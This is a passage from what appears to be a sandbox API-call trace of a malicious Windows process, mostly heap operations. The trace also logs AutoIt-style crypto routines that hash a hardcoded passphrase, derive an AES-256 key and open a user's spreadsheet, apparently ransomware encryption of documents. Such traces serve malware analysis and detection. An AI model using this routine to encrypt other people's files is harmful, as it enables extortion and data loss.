hHeap=0x1780000) returned 1 [0078.163] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0078.163] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0078.163] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0078.163] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0078.163] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0078.163] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0078.163] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0078.163] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e30 | out: hHeap=0x1780000) returned 1 [0078.163] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e00 | out: hHeap=0x1780000) returned 1 [0078.163] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0078.163] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0078.163] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0078.163] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0078.163] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0078.163] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0078.163] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c68 | out: hHeap=0x1780000) returned 1 [0078.164] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9dd0 | out: hHeap=0x1780000) returned 1 [0078.164] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf838 | out: hHeap=0x1780000) returned 1 [0078.164] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0078.164] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf608 | out: hHeap=0x1780000) returned 1 [0078.164] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e78 | out: hHeap=0x1780000) returned 1 [0078.164] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c80 | out: hHeap=0x1780000) returned 1 [0078.164] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0078.164] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0078.164] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cb0 | out: hHeap=0x1780000) returned 1 [0078.164] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391af0 | out: hHeap=0x1780000) returned 1 [0078.164] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0078.164] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0078.164] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9de8 | out: hHeap=0x1780000) returned 1 [0078.164] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0078.164] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21a0 | out: hHeap=0x1780000) returned 1 [0078.164] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0078.164] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0078.164] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) returned 1 [0078.164] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2420 | out: hHeap=0x1780000) returned 1 [0078.164] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0078.164] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0078.164] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4369e20 | out: hHeap=0x1780000) returned 1 [0078.164] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0078.164] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0078.164] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0078.164] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0078.164] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0078.164] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0078.165] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0078.165] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0078.165] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0078.165] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0078.165] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea508 | out: hHeap=0x1780000) returned 1 [0078.165] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0078.165] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0078.165] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0078.165] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0078.165] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0078.165] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d88 | out: hHeap=0x1780000) returned 1 [0078.165] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2270 | out: hHeap=0x1780000) returned 1 [0078.165] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0078.165] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0078.165] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0078.165] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43c9e00, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0078.166] CloseHandle (hObject=0x258) returned 1 [0078.166] FreeLibrary (hLibModule=0x772d0000) returned 1 [0078.166] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0078.166] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\WfOLKWjF.xlsx", lpFindFileData=0x144ed28 | out: lpFindFileData=0x144ed28*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd56d6b00, ftCreationTime.dwHighDateTime=0x1d5b5ba, ftLastAccessTime.dwLowDateTime=0x6627ef90, ftLastAccessTime.dwHighDateTime=0x1d57c0d, ftLastWriteTime.dwLowDateTime=0x6627ef90, ftLastWriteTime.dwHighDateTime=0x1d57c0d, nFileSizeHigh=0x0, nFileSizeLow=0x1a9b, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="WfOLKWjF.xlsx", cAlternateFileName="WFOLKW~1.XLS")) returned 0x41ac180 [0078.166] FindClose (in: hFindFile=0x41ac180 | out: hFindFile=0x41ac180) returned 1 [0078.166] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0078.168] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0078.168] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0078.168] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0078.169] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0078.169] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0078.169] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1796d68, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0078.169] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0078.169] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1796d88, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0078.169] CryptAcquireContextA (in: phProv=0x144ea08, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144ea08*=0x41a5250) returned 1 [0078.170] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0078.170] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0078.170] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0078.170] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0078.170] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0078.170] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0078.171] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0078.171] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0078.171] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0078.171] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0078.171] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43ca778, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0078.171] CryptCreateHash (in: hProv=0x41a5250, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e778 | out: phHash=0x144e778) returned 1 [0078.171] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0078.171] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2788, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0078.171] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0078.171] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0078.171] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2b48, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0078.171] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0078.171] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0078.171] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0078.171] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43ca970, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0078.171] CryptHashData (hHash=0x41abfc0, pbData=0x17e2b18, dwDataLen=0x22, dwFlags=0x1) returned 1 [0078.172] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0078.172] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0078.172] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0078.172] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0078.172] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43ca778, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0078.172] CryptDeriveKey (in: hProv=0x41a5250, Algid=0x6610, hBaseData=0x41abfc0, dwFlags=0x1, phKey=0x144e778 | out: phKey=0x144e778*=0x41ac140) returned 1 [0078.172] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0078.172] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0078.172] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0078.172] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796d88, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0078.172] CryptDestroyHash (hHash=0x41abfc0) returned 1 [0078.172] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0078.172] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9e90 [0078.172] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0078.172] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0078.172] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0078.172] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0078.172] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0078.172] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0078.173] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0078.173] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0078.173] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0078.173] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0078.173] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff18 [0078.173] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0078.173] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0078.173] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0078.173] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0078.173] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0078.173] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0078.173] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23d0 [0078.173] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9c68 [0078.173] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0078.173] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac500 [0078.173] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0078.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac500 | out: hHeap=0x1780000) returned 1 [0078.173] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0078.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac180 | out: hHeap=0x1780000) returned 1 [0078.173] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0078.173] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0078.173] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0078.173] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9de8 [0078.174] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0078.174] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0078.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0078.174] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0078.174] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2390 [0078.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0078.174] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac500 [0078.174] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43eb3a8 [0078.174] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0078.174] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2390 [0078.174] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\WfOLKWjF.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\wfolkwjf.xlsx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0078.174] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.174] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eeb0 | out: lpNewFilePointer=0x0) returned 1 [0078.174] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0078.174] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0078.174] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23d0 [0078.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0078.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9de8 | out: hHeap=0x1780000) returned 1 [0078.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0078.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) returned 1 [0078.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0078.175] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0078.175] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2420 [0078.175] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0078.175] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0078.175] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ee8 [0078.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0078.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ee8 | out: hHeap=0x1780000) returned 1 [0078.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0078.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2420 | out: hHeap=0x1780000) returned 1 [0078.175] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac180 [0078.175] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0078.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac180 | out: hHeap=0x1780000) returned 1 [0078.175] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0078.175] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0078.175] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0078.175] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0078.175] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2420 [0078.175] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0078.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2420 | out: hHeap=0x1780000) returned 1 [0078.175] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0078.175] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2420 [0078.175] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0078.175] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0078.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0078.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0078.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2420 | out: hHeap=0x1780000) returned 1 [0078.176] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0078.176] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2420 [0078.176] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0078.176] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0078.176] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0078.176] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0078.176] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0078.176] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0078.176] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0078.176] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0078.176] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0078.176] RtlAllocateHeap (HeapHandle=0x1780000, 